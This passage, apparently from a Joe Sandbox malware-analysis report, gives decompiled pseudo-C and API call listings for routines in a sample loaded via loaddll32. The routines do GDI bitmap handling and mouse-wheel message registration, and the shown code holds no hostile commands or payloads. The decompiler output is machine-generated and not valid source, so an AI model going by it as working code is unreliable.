                          								_push(_t123);
                          								_push(_v16);
                          								L007066F0();
                          								_push(_v16);
                          								L007066C8();
                          								_push(0);
                          								_push(_t123);
                          								_push(_v20);
                          								L007066F0();
                          								_push(_v20);
                          								L007066C8();
                          							}
                          							_t77 = SetBkColor(_v16, _t120);
                          							_push(0xcc0020);
                          							_push(0);
                          							_push(0);
                          							_push(_v16);
                          							_push(_v108);
                          							_push(_v112);
                          							_push(0);
                          							_push(0);
                          							_push(_v20);
                          							L00706568();
                          							SetBkColor(_v16, _t77);
                          							if(_v28 != 0) {
                          								SelectObject(_v16, _v28);
                          							}
                          							if(_v21 != 0) {
                          								DeleteObject(_t107);
                          							}
                          							_pop(_t117);
                          							 *[fs:eax] = _t117;
                          							_push(0x7249d6);
                          							return DeleteDC(_v16);
                          						} else {
                          							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                          							if(_v32 != 0) {
                          								SelectObject(_v20, _v32);
                          							}
                          							goto L17;
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • GetObjectA.GDI32(?,00000054,?), ref: 0072483F
                          • 7378AC50.USER32(00000000,00000000,00724A17,?,?,00000054,?), ref: 0072486D
                          • 7378A590.GDI32(?,00000000,00000000,00724A17,?,?,00000054,?), ref: 0072487E
                          • 7378A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00724A17,?,?,00000054,?), ref: 00724899
                          • SelectObject.GDI32(?,00000000), ref: 007248B3
                          • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 007248D5
                          • 7378A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,00724A17,?,?,00000054,?), ref: 007248E3
                          • SelectObject.GDI32(?), ref: 0072492B
                          • 7378B410.GDI32(?,?,00000000,?,?,00000000,007249CF,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 0072493E
                          • 7378B150.GDI32(?,?,?,00000000,?,?,00000000,007249CF,?,?,?,00000000,?,?,00000001,00000001), ref: 00724947
                          • 7378B410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,007249CF,?,?,?,00000000,?), ref: 00724953
                          • 7378B150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,007249CF,?,?,?,00000000), ref: 0072495C
                          • SetBkColor.GDI32(?), ref: 00724966
                          • 737997E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,007249CF), ref: 0072498A
                          • SetBkColor.GDI32(?,00000000), ref: 00724994
                          • SelectObject.GDI32(?,00000000), ref: 007249A7
                          • DeleteObject.GDI32 ref: 007249B3
                          • DeleteDC.GDI32(?), ref: 007249C9
                          • SelectObject.GDI32(?,00000000), ref: 007249E4
                          • DeleteDC.GDI32(00000000), ref: 00724A00
                          • 7378B380.USER32(00000000,00000000,00724A1E,00000001,00000000,?,00000000,00000000,00724A17,?,?,00000054,?), ref: 00724A11
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$Object$Select$Delete$A590B150B410Color$737997A410B380
                          • String ID:
                          • API String ID: 2769308743-0
                          • Opcode ID: 1ab774d7d16c5a6841a3ef504d0098e54dc3d0ab045306c63c1728a0f920de74
                          • Instruction ID: 17b0aefe7df663a522b0538ab322f85c6cd63edb3184f4d71ea1523db86dc0f6
                          • Opcode Fuzzy Hash: 1ab774d7d16c5a6841a3ef504d0098e54dc3d0ab045306c63c1728a0f920de74
                          • Instruction Fuzzy Hash: 7E510CB5E40218EFDB10EBE8DC5AFAEB7FCAB09700F104565B614E72C1D679A950CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E00725624(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                          				intOrPtr _v8;
                          				intOrPtr* _v12;
                          				void* _v16;
                          				struct HDC__* _v20;
                          				char _v24;
                          				intOrPtr* _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				signed int _v37;
                          				intOrPtr _v44;
                          				void* _v48;
                          				struct HDC__* _v52;
                          				intOrPtr _v56;
                          				intOrPtr* _v60;
                          				intOrPtr* _v64;
                          				short _v66;
                          				short _v68;
                          				signed short _v70;
                          				signed short _v72;
                          				void* _v76;
                          				intOrPtr _v172;
                          				char _v174;
                          				intOrPtr _t150;
                          				signed int _t160;
                          				intOrPtr _t163;
                          				void* _t166;
                          				void* _t174;
                          				void* _t183;
                          				signed int _t188;
                          				intOrPtr _t189;
                          				struct HDC__* _t190;
                          				struct HDC__* _t204;
                          				signed int _t208;
                          				signed short _t214;
                          				intOrPtr _t241;
                          				intOrPtr* _t245;
                          				intOrPtr _t251;
                          				intOrPtr _t289;
                          				intOrPtr _t290;
                          				intOrPtr _t295;
                          				signed int _t297;
                          				signed int _t317;
                          				void* _t319;
                          				void* _t320;
                          				signed int _t321;
                          				void* _t322;
                          				void* _t323;
                          				void* _t324;
                          				intOrPtr _t325;
                          
                          				_t316 = __edi;
                          				_t323 = _t324;
                          				_t325 = _t324 + 0xffffff54;
                          				_t319 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_v52 = 0;
                          				_v44 = 0;
                          				_v60 = 0;
                          				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
                          				_v37 = _v36 == 0xc;
                          				if(_v37 != 0) {
                          					_v36 = 0x28;
                          				}
                          				_v28 = E007026CC(_v36 + 0x40c);
                          				_v64 = _v28;
                          				_push(_t323);
                          				_push(0x725b41);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t325;
                          				_push(_t323);
                          				_push(0x725b14);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t325;
                          				if(_v37 == 0) {
                          					 *((intOrPtr*)( *_v12 + 0xc))();
                          					_t320 = _t319 - _v36;
                          					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                          					if(_t150 != 3 && _t150 != 0) {
                          						_v60 = E00703244(1);
                          						if(_a4 == 0) {
                          							E00702C80( &_v174, 0xe);
                          							_v174 = 0x4d42;
                          							_v172 = _v36 + _t320;
                          							_a4 =  &_v174;
                          						}
                          						 *((intOrPtr*)( *_v60 + 0x10))();
                          						 *((intOrPtr*)( *_v60 + 0x10))();
                          						 *((intOrPtr*)( *_v60 + 0x10))();
                          						E00719144(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
                          						 *((intOrPtr*)( *_v60 + 0x14))();
                          						_v12 = _v60;
                          					}
                          				} else {
                          					 *((intOrPtr*)( *_v12 + 0xc))();
                          					_t251 = _v64;
                          					E00702C80(_t251, 0x28);
                          					_t241 = _t251;
                          					 *(_t241 + 4) = _v72 & 0x0000ffff;
                          					 *(_t241 + 8) = _v70 & 0x0000ffff;
                          					 *((short*)(_t241 + 0xc)) = _v68;
                          					 *((short*)(_t241 + 0xe)) = _v66;
                          					_t320 = _t319 - 0xc;
                          				}
                          				_t245 = _v64;
                          				 *_t245 = _v36;
                          				_v32 = _v28 + _v36;
                          				if( *((short*)(_t245 + 0xc)) != 1) {
                          					E00721054();
                          				}
                          				if(_v36 == 0x28) {
                          					_t214 =  *(_t245 + 0xe);
                          					if(_t214 == 0x10 || _t214 == 0x20) {
                          						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
                          							E007190D4(_v12, 0xc, _v32);
                          							_v32 = _v32 + 0xc;
                          							_t320 = _t320 - 0xc;
                          						}
                          					}
                          				}
                          				if( *(_t245 + 0x20) == 0) {
                          					 *(_t245 + 0x20) = E007212E4( *(_t245 + 0xe));
                          				}
                          				_t317 = _v37 & 0x000000ff;
                          				_t257 =  *(_t245 + 0x20) * 0;
                          				E007190D4(_v12,  *(_t245 + 0x20) * 0, _v32);
                          				_t321 = _t320 -  *(_t245 + 0x20) * 0;
                          				if( *(_t245 + 0x14) == 0) {
                          					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
                          					_t208 = E00721304( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
                          					asm("cdq");
                          					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                          					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                          				}
                          				_t160 =  *(_t245 + 0x14);
                          				if(_t321 > _t160) {
                          					_t321 = _t160;
                          				}
                          				if(_v37 != 0) {
                          					_t160 = E007215AC(_v32);
                          				}
                          				_push(0);
                          				L007068E8();
                          				_v16 = E00721174(_t160);
                          				_push(_t323);
                          				_push(0x725a8f);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t325;
                          				_t163 =  *((intOrPtr*)(_v64 + 0x10));
                          				if(_t163 == 0 || _t163 == 3) {
                          					if( *0x76c460 == 0) {
                          						_push(0);
                          						_push("true");
                          						_push( &_v24);
                          						_push(0);
                          						_push(_v28);
                          						_t166 = _v16;
                          						_push(_t166);
                          						L00706598();
                          						_v44 = _t166;
                          						if(_v44 == 0 || _v24 == 0) {
                          							if(GetLastError() != 0) {
                          								E0070CDE4(_t245, _t257, _t317, _t321);
                          							} else {
                          								E00721054();
                          							}
                          						}
                          						_push(_t323);
                          						_push( *[fs:eax]);
                          						 *[fs:eax] = _t325;
                          						E007190D4(_v12, _t321, _v24);
                          						_pop(_t289);
                          						 *[fs:eax] = _t289;
                          						_t290 = 0x725a5e;
                          						 *[fs:eax] = _t290;
                          						_push(0x725a96);
                          						_t174 = _v16;
                          						_push(_t174);
                          						_push(0);
                          						L00706B28();
                          						return _t174;
                          					} else {
                          						goto L27;
                          					}
                          				} else {
                          					L27:
                          					_v20 = 0;
                          					_v24 = E007026CC(_t321);
                          					_push(_t323);
                          					_push(0x7259f7);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t325;
                          					_t263 = _t321;
                          					E007190D4(_v12, _t321, _v24);
                          					_push(_v16);
                          					L00706590();
                          					_v20 = E00721174(_v16);
                          					_push(1);
                          					_push(1);
                          					_t183 = _v16;
                          					_push(_t183);
                          					L00706588();
                          					_v48 = SelectObject(_v20, _t183);
                          					_v56 = 0;
                          					_t188 =  *(_v64 + 0x20);
                          					if(_t188 > 0) {
                          						_t263 = _t188;
                          						_v52 = E00721864(0, _t188);
                          						_push(0);
                          						_push(_v52);
                          						_t204 = _v20;
                          						_push(_t204);
                          						L007066F0();
                          						_v56 = _t204;
                          						_push(_v20);
                          						L007066C8();
                          					}
                          					_push(_t323);
                          					_push(0x7259cb);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t325;
                          					_push(0);
                          					_t189 = _v28;
                          					_push(_t189);
                          					_push(_v24);
                          					_push(4);
                          					_push(_t189);
                          					_t190 = _v20;
                          					_push(_t190);
                          					L007065A0();
                          					_v44 = _t190;
                          					if(_v44 == 0) {
                          						if(GetLastError() != 0) {
                          							E0070CDE4(_t245, _t263, _t317, _t321);
                          						} else {
                          							E00721054();
                          						}
                          					}
                          					_pop(_t295);
                          					 *[fs:eax] = _t295;
                          					_push(0x7259d2);
                          					if(_v56 != 0) {
                          						_push(0xffffffff);
                          						_push(_v56);
                          						_push(_v20);
                          						L007066F0();
                          					}
                          					return DeleteObject(SelectObject(_v20, _v48));
                          				}
			}

                          APIs
                          • 7378AC50.USER32(00000000,?,00000000,00725B41,?,?), ref: 0072588E
                          • 7378A590.GDI32(00000001,00000000,007259F7,?,00000000,00725A8F,?,00000000,?,00000000,00725B41,?,?), ref: 007258F3
                          • 7378A520.GDI32(00000001,00000001,00000001,00000001,00000000,007259F7,?,00000000,00725A8F,?,00000000,?,00000000,00725B41,?,?), ref: 00725908
                          • SelectObject.GDI32(?,00000000), ref: 00725912
                          • 7378B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,007259F7,?,00000000,00725A8F,?,00000000), ref: 00725942
                          • 7378B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,007259F7,?,00000000,00725A8F), ref: 0072594E
                          • 7378A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,007259CB,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00725972
                          • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,007259CB,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00725980
                          • 7378B410.GDI32(?,00000000,000000FF,007259D2,00000000,?,00000000,00000000,007259CB,?,?,00000000,00000001,00000001,00000001,00000001), ref: 007259B2
                          • SelectObject.GDI32(?,?), ref: 007259BF
                          • DeleteObject.GDI32(00000000), ref: 007259C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$Object$B410Select$A520A590B150DeleteErrorLast
                          • String ID: ($BM$lTq
                          • API String ID: 929566397-33054541
                          • Opcode ID: aea43f80664d761fe897b81811abec231ad0dd679a591929100ed8e026b6341e
                          • Instruction ID: ac80f84b1be849bac8fbbc43bca72faca66ad8da368e4d14e6399bc6641ef05f
                          • Opcode Fuzzy Hash: aea43f80664d761fe897b81811abec231ad0dd679a591929100ed8e026b6341e
                          • Instruction Fuzzy Hash: 01D14874E00618DFDF14EFA8D899AAEBBF5FF48310F048565E904EB295D7389881CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E00724D20(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _v8;
                          				void* _v12;
                          				char _v13;
                          				struct tagPOINT _v21;
                          				struct HDC__* _v28;
                          				void* _v32;
                          				intOrPtr _t78;
                          				struct HDC__* _t80;
                          				signed int _t82;
                          				signed int _t83;
                          				signed int _t84;
                          				char _t85;
                          				void* _t92;
                          				struct HDC__* _t115;
                          				void* _t136;
                          				struct HDC__* _t160;
                          				intOrPtr* _t164;
                          				intOrPtr _t172;
                          				intOrPtr _t176;
                          				intOrPtr _t178;
                          				intOrPtr _t180;
                          				int* _t184;
                          				intOrPtr _t186;
                          				void* _t188;
                          				void* _t189;
                          				intOrPtr _t190;
                          
                          				_t165 = __ecx;
                          				_t188 = _t189;
                          				_t190 = _t189 + 0xffffffe4;
                          				_t184 = __ecx;
                          				_v8 = __edx;
                          				_t164 = __eax;
                          				_t186 =  *((intOrPtr*)(__eax + 0x28));
                          				_t172 =  *0x724f6c; // 0xf
                          				E00720E50(_v8, __ecx, _t172);
                          				E0072539C(_t164);
                          				_v12 = 0;
                          				_v13 = 0;
                          				_t78 =  *((intOrPtr*)(_t186 + 0x10));
                          				if(_t78 != 0) {
                          					_push(0xffffffff);
                          					_push(_t78);
                          					_t160 =  *(_v8 + 4);
                          					_push(_t160);
                          					L007066F0();
                          					_v12 = _t160;
                          					_push( *(_v8 + 4));
                          					L007066C8();
                          					_v13 = 1;
                          				}
                          				_push(0xc);
                          				_t80 =  *(_v8 + 4);
                          				_push(_t80);
                          				L00706630();
                          				_push(_t80);
                          				_push(0xe);
                          				_t82 =  *(_v8 + 4);
                          				L00706630();
                          				_t83 = _t82;
                          				_t84 = _t83 * _t82;
                          				if(_t84 > 8) {
                          					L4:
                          					_t85 = 0;
                          				} else {
                          					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
                          					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
                          						_t85 = 1;
                          					} else {
                          						goto L4;
                          					}
                          				}
                          				if(_t85 == 0) {
                          					if(E007250AC(_t164) == 0) {
                          						SetStretchBltMode(E00720D7C(_v8), 3);
                          					}
                          				} else {
                          					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                          					SetStretchBltMode( *(_v8 + 4), 4);
                          					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                          				}
                          				_push(_t188);
                          				_push(0x724f5c);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t190;
                          				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
                          					E0072533C(_t164, _t165);
                          				}
                          				_t92 = E00724FF0(_t164);
                          				_t176 =  *0x724f6c; // 0xf
                          				E00720E50(_t92, _t165, _t176);
                          				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
                          					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E00724FF0(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
                          					_pop(_t178);
                          					 *[fs:eax] = _t178;
                          					_push(0x724f63);
                          					if(_v13 != 0) {
                          						_push(0xffffffff);
                          						_push(_v12);
                          						_t115 =  *(_v8 + 4);
                          						_push(_t115);
                          						L007066F0();
                          						return _t115;
                          					}
                          					return 0;
                          				} else {
                          					_v32 = 0;
                          					_v28 = 0;
                          					_push(_t188);
                          					_push(0x724ef1);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t190;
                          					L00706590();
                          					_v28 = E00721174(0);
                          					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
                          					E00721318( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E00724FF0(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
                          					_t136 = 0;
                          					_t180 = 0;
                          					 *[fs:eax] = _t180;
                          					_push(0x724f36);
                          					if(_v32 != 0) {
                          						_t136 = SelectObject(_v28, _v32);
                          					}
                          					if(_v28 != 0) {
                          						return DeleteDC(_v28);
                          					}
                          					return _t136;
                          				}
			}

                          APIs
                            • Part of subcall function 0072539C: 7378AC50.USER32(00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 007253F2
                            • Part of subcall function 0072539C: 7378AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725407
                            • Part of subcall function 0072539C: 7378AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725411
                            • Part of subcall function 0072539C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725435
                            • Part of subcall function 0072539C: 7378B380.USER32(00000000,00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725440
                          • 7378B410.GDI32(?,?,000000FF), ref: 00724D62
                          • 7378B150.GDI32(?,?,?,000000FF), ref: 00724D71
                          • 7378AD70.GDI32(?,0000000C), ref: 00724D83
                          • 7378AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00724D92
                          • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00724DC5
                          • SetStretchBltMode.GDI32(?,00000004), ref: 00724DD3
                          • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00724DEB
                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 00724E08
                          • 7378A590.GDI32(00000000,00000000,00724EF1,?,?,0000000E,00000000,?,0000000C), ref: 00724E68
                          • SelectObject.GDI32(?,?), ref: 00724E7D
                          • SelectObject.GDI32(?,00000000), ref: 00724EDC
                          • DeleteDC.GDI32(00000000), ref: 00724EEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                          • String ID:
                          • API String ID: 3450332414-0
                          • Opcode ID: 2e8b76477980d9f876db4c19b64516a0fe2add683e0e157d9b00b6f438f23cbc
                          • Instruction ID: be3b114a4dfbe332210e1f59465d11d1e48501a2836dc15683ec42f10c062df7
                          • Opcode Fuzzy Hash: 2e8b76477980d9f876db4c19b64516a0fe2add683e0e157d9b00b6f438f23cbc
                          • Instruction Fuzzy Hash: FC7126B5A00215EFDB10DFACD999F5EBBF8AB48300F158554F618D7692D638ED10CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E00721184(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                          				void* _v8;
                          				int _v12;
                          				int _v16;
                          				void* _v20;
                          				int _v24;
                          				struct HDC__* _v28;
                          				struct HDC__* _v32;
                          				int _v48;
                          				int _v52;
                          				void _v56;
                          				int _t37;
                          				void* _t41;
                          				int _t43;
                          				void* _t47;
                          				void* _t72;
                          				intOrPtr _t79;
                          				intOrPtr _t80;
                          				void* _t85;
                          				void* _t87;
                          				void* _t88;
                          				intOrPtr _t89;
                          
                          				_t87 = _t88;
                          				_t89 = _t88 + 0xffffffcc;
                          				asm("movsd");
                          				asm("movsd");
                          				_t71 = __ecx;
                          				_v8 = __eax;
                          				_push(0);
                          				L00706590();
                          				_v28 = __eax;
                          				_push(0);
                          				L00706590();
                          				_v32 = __eax;
                          				_push(_t87);
                          				_push(0x7212d2);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t89;
                          				_t37 = GetObjectA(_v8, 0x18,  &_v56);
                          				if(__ecx == 0) {
                          					_push(0);
                          					L007068E8();
                          					_v24 = _t37;
                          					if(_v24 == 0) {
                          						E007210CC(__ecx);
                          					}
                          					_push(_t87);
                          					_push(0x721241);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t89;
                          					_push(_v12);
                          					_push(_v16);
                          					_t41 = _v24;
                          					_push(_t41);
                          					L00706588();
                          					_v20 = _t41;
                          					if(_v20 == 0) {
                          						E007210CC(_t71);
                          					}
                          					_pop(_t79);
                          					 *[fs:eax] = _t79;
                          					_push(0x721248);
                          					_t43 = _v24;
                          					_push(_t43);
                          					_push(0);
                          					L00706B28();
                          					return _t43;
                          				} else {
                          					_push(0);
                          					_push(1);
                          					_push(1);
                          					_push(_v12);
                          					_t47 = _v16;
                          					_push(_t47);
                          					L00706578();
                          					_v20 = _t47;
                          					if(_v20 != 0) {
                          						_t72 = SelectObject(_v28, _v8);
                          						_t85 = SelectObject(_v32, _v20);
                          						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                          						if(_t72 != 0) {
                          							SelectObject(_v28, _t72);
                          						}
                          						if(_t85 != 0) {
                          							SelectObject(_v32, _t85);
                          						}
                          					}
                          					_pop(_t80);
                          					 *[fs:eax] = _t80;
                          					_push(E007212D9);
                          					DeleteDC(_v28);
                          					return DeleteDC(_v32);
                          				}
                          			}

                          0x00721185
                          0x00721187
                          0x00721192
                          0x00721193
                          0x00721194
                          0x00721196
                          0x00721199
                          0x0072119b
                          0x007211a0
                          0x007211a3
                          0x007211a5
                          0x007211aa
                          0x007211af
                          0x007211b0
                          0x007211b5
                          0x007211b8
                          0x007211c5
                          0x007211cc
                          0x007211e6
                          0x007211e8
                          0x007211ed
                          0x007211f4
                          0x007211f6
                          0x007211f6
                          0x007211fd
                          0x007211fe
                          0x00721203
                          0x00721206
                          0x0072120c
                          0x00721210
                          0x00721211
                          0x00721214
                          0x00721215
                          0x0072121a
                          0x00721221
                          0x00721223
                          0x00721223
                          0x0072122a
                          0x0072122d
                          0x00721230
                          0x00721235
                          0x00721238
                          0x00721239
                          0x0072123b
                          0x00721240
                          0x007211ce
                          0x007211ce
                          0x007211d0
                          0x007211d2
                          0x007211d7
                          0x007211d8
                          0x007211db
                          0x007211dc
                          0x007211e1
                          0x0072124c
                          0x0072125b
                          0x0072126a
                          0x00721291
                          0x00721298
                          0x0072129f
                          0x0072129f
                          0x007212a6
                          0x007212ad
                          0x007212ad
                          0x007212a6
                          0x007212b4
                          0x007212b7
                          0x007212ba
                          0x007212c3
                          0x007212d1
                          0x007212d1

                          APIs
                          • 7378A590.GDI32(00000000), ref: 0072119B
                          • 7378A590.GDI32(00000000,00000000), ref: 007211A5
                          • GetObjectA.GDI32(?,00000018,?), ref: 007211C5
                          • 7378A410.GDI32(?,?,00000001,00000001,00000000,00000000,007212D2,?,00000000,00000000), ref: 007211DC
                          • 7378AC50.USER32(00000000,00000000,007212D2,?,00000000,00000000), ref: 007211E8
                          • 7378A520.GDI32(00000000,?,?,00000000,00721241,?,00000000,00000000,007212D2,?,00000000,00000000), ref: 00721215
                          • 7378B380.USER32(00000000,00000000,00721248,00000000,00721241,?,00000000,00000000,007212D2,?,00000000,00000000), ref: 0072123B
                          • SelectObject.GDI32(?,?), ref: 00721256
                          • SelectObject.GDI32(?,00000000), ref: 00721265
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00721291
                          • SelectObject.GDI32(?,00000000), ref: 0072129F
                          • SelectObject.GDI32(?,00000000), ref: 007212AD
                          • DeleteDC.GDI32(?), ref: 007212C3
                          • DeleteDC.GDI32(?), ref: 007212CC
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$Object$Select$A590Delete$A410A520B380Stretch
                          • String ID:
                          • API String ID: 1734081924-0
                          • Opcode ID: 2ac3ad2609a09f8635ff1db2fbf2a1ec10514beb235fe7a5c8dfbdfe98ca2052
                          • Instruction ID: 31a8fd6c3d8ffae0f44572677b634b5b43ae406716e1e93b3eb86b4026879e14
                          • Opcode Fuzzy Hash: 2ac3ad2609a09f8635ff1db2fbf2a1ec10514beb235fe7a5c8dfbdfe98ca2052
                          • Instruction Fuzzy Hash: FD41EBB5E40219EFDB10EBE8DC56FAEB7FCFB09700F904564B604E7281D679A9508B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00706DC4(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                          				intOrPtr* _v8;
                          				struct HWND__* _t19;
                          				int* _t20;
                          				int* _t26;
                          				int* _t27;
                          
                          				_t26 = _t20;
                          				_t27 = __edx;
                          				_v8 = __eax;
                          				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                          				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                          				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                          				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                          				if( *_t27 == 0 || _t19 == 0) {
                          					 *_a8 = 0;
                          				} else {
                          					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                          				}
                          				if( *_t26 == 0 || _t19 == 0) {
                          					 *_a4 = 3;
                          				} else {
                          					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                          				}
                          				return _t19;
                          			}

                          0x00706dcb
                          0x00706dcd
                          0x00706dcf
                          0x00706de1
                          0x00706df0
                          0x00706dfc
                          0x00706e08
                          0x00706e0d
                          0x00706e2c
                          0x00706e13
                          0x00706e23
                          0x00706e23
                          0x00706e31
                          0x00706e4e
                          0x00706e37
                          0x00706e47
                          0x00706e47
                          0x00706e5b

                          APIs
                          • FindWindowA.USER32 ref: 00706DDC
                          • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00706DE8
                          • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00706DF7
                          • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00706E03
                          • SendMessageA.USER32 ref: 00706E1B
                          • SendMessageA.USER32 ref: 00706E3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: ClipboardFormatRegister$MessageSend$FindWindow
